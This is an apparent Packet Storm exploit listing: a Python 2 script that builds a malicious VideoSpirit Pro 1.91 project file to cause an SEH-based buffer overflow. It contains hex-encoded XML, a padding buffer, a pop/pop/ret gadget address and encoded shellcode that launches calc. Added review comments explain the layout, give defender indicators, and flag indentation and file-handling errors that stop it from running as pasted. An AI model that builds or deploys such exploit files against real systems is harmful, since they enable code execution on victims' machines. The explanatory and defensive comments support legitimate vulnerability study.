VideoSpirit Pro 1.91 Buffer Overflow

2015-04-27T00:00:00
ID PACKETSTORM:131647
Type packetstorm
Reporter evil_comrade
Modified 2015-04-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Exploit Title: VideoSpirit Pro v1.91
# Date: 27/April/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003@yahoo.com
# Version: 1.91
# Tested on: Win XP3 and Win 7
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
#Greetz: b33f,corelan,offsec,vulnhub,HUST510
#
# NOTE(review): Python 2 script (print statements, str used as raw bytes).
# It never touches the target process itself: it only writes a VideoSpirit
# project file (evil.visprj) in which one XML attribute value is oversized.
# The overflow is triggered when that file is opened in VideoSpirit Pro 1.91.
# From a defender's point of view the file is the artifact to look for: a
# .visprj whose <valitem name="mp3"> value attribute is several KB long
# instead of a short codec/bitrate string.
#
# Total length, in bytes, of the oversized attribute value built below.
buffersize=5000
# Header: hex-escaped plain ASCII.  It decodes to the start of an ordinary
# .visprj XML document (<version value="3" />, a <track> block, <track0 />..
# <track4 />, <clip />, <output typename="AVI" keepaspect="0"
# presetquality="0">, a <type0 enable="1"> section of <valitem name=...
# value=... /> entries and the opening of <type1 enable="1">).  The last line
# ends mid-element at `<valitem name="mp3" value="`, so everything appended
# after Header lands inside that attribute value.
Header=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")
# Layout of the oversized attribute value.  The structure is the classic
# SEH-overwrite pattern described by the author's own comments; the offsets
# and addresses are taken from those comments and are not re-verified here.
# (`buffer` also shadows the Python 2 builtin of the same name.)
#   104 bytes of filler up to the exception-handler record,
buffer="A"*104
#   a 4-byte stub that sits where the next-SEH pointer is overwritten,
buffer += "\xEB\x07\x90\x90"
#   then the overwritten handler address, stored little-endian.  The author's
#   comment identifies it as a pop/pop/ret inside OverlayPlug.dll.  A gadget
#   like this is only usable because that module is presumably loaded at a
#   fixed base and not SafeSEH-registered; SafeSEH/ASLR/DEP on the module is
#   what would break this chain.
#0x100caa30 : pop ebp # pop ecx # ret | {PAGE_EXECUTE_READ} [OverlayPlug.dll]
buffer +="\x30\xaa\x0C\x10"
#   NOP sled,
buffer += "\x90" * 24
#   and the encoded shellcode generated by the command on the next line:
#   windows/exec running calc (a benign proof-of-concept payload), encoded
#   with shikata_ga_nai to avoid the listed bad characters NUL, LF, CR, '!'
#   and '"' (the double quote would terminate the XML attribute early).
#msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x21\x22" -t c -e x86/shikata_ga_nai
buffer += ("\xd9\xc3\xba\x97\xfd\x6f\x90\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x32\x31\x56\x17\x03\x56\x17\x83\x79\x01\x8d\x65\x79\x12\xdb"
"\x86\x81\xe3\xbc\x0f\x64\xd2\xee\x74\xed\x47\x3f\xfe\xa3\x6b"
"\xb4\x52\x57\xff\xb8\x7a\x58\x48\x76\x5d\x57\x49\xb6\x61\x3b"
"\x89\xd8\x1d\x41\xde\x3a\x1f\x8a\x13\x3a\x58\xf6\xdc\x6e\x31"
"\x7d\x4e\x9f\x36\xc3\x53\x9e\x98\x48\xeb\xd8\x9d\x8e\x98\x52"
"\x9f\xde\x31\xe8\xd7\xc6\x3a\xb6\xc7\xf7\xef\xa4\x34\xbe\x84"
"\x1f\xce\x41\x4d\x6e\x2f\x70\xb1\x3d\x0e\xbd\x3c\x3f\x56\x79"
"\xdf\x4a\xac\x7a\x62\x4d\x77\x01\xb8\xd8\x6a\xa1\x4b\x7a\x4f"
"\x50\x9f\x1d\x04\x5e\x54\x69\x42\x42\x6b\xbe\xf8\x7e\xe0\x41"
"\x2f\xf7\xb2\x65\xeb\x5c\x60\x07\xaa\x38\xc7\x38\xac\xe4\xb8"
"\x9c\xa6\x06\xac\xa7\xe4\x4c\x33\x25\x93\x29\x33\x35\x9c\x19"
"\x5c\x04\x17\xf6\x1b\x99\xf2\xb3\xd4\xd3\x5f\x95\x7c\xba\x35"
"\xa4\xe0\x3d\xe0\xea\x1c\xbe\x01\x92\xda\xde\x63\x97\xa7\x58"
"\x9f\xe5\xb8\x0c\x9f\x5a\xb8\x04\xfc\x3d\x2a\xc4\x03")
# Pad the attribute value out to exactly buffersize bytes with filler.
buffer +="A"*(buffersize - (len(buffer)))
# Footer: hex-escaped plain ASCII again.  It closes the attribute (`" />`),
# emits the remaining <valitem> entries of <type1> (128k, 44100, 2 (Stereo)),
# then </type1>, <type2 enable="0" /> and </output>, so the file still parses
# as a well-formed project apart from the oversized value.
Footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")
# Full file content: ordinary XML on both sides of the one oversized value.
sploit = Header + buffer + Footer
# NOTE(review): the try/except bodies below lost their indentation in this
# pasted copy and will not parse as written; the lines between `try:` and
# `except:`, and the print after `except:`, each need to be indented.
try:
print "[+]Creating Exploit File...\n"
# `file` shadows the Python 2 builtin of the same name; the output file is
# written in text mode, which on Windows would translate the LF bytes in the
# XML to CRLF but leaves the single-byte values of the payload unchanged.
file = open("evil.visprj","w")
file.write(sploit)
# Missing parentheses: this only looks up the bound method and never calls
# it, so the file is not closed here and is left to CPython to close when the
# object is collected or the interpreter exits.  `with open(...) as f:` is the
# correct form.
file.close
print "[+]File evil.visprj create successfully.\n"
# Bare except hides the actual error (e.g. a permission problem) behind a
# generic message.
except:
print "*Failed to create file!!!\n"
`